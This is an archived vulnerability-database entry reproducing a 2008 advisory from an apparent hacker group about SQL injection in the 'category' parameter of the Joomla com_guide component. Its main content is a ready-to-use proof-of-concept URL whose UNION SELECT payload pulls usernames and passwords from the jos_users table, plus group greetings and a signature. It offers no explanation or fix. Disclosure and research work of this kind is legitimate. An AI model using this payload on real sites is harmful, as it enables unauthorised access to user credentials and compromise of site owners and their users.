Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19421
HistoryMar 17, 2008 - 12:00 a.m.

Joomla components com_guide "category" Remote SQL Injection [Aria-Security]

2008-03-1700:00:00
vulners.com
10

Aria-Security Team (Persian Security Network)
http://forum.aria-security.com

Join our english forum @ http://forum.aria-security.com
Shoutz: Aura, Null, Kinglet, t3rr0r1st
Joomla components com_guide "category" Remote SQL Injection

Poc:

index.php?option=com_guide&category=-999999//union//select//0,username,password,3,4,5,6,7,8//from/**/jos_users/*

Regards,
The-0utl4w
Edit/Delete Message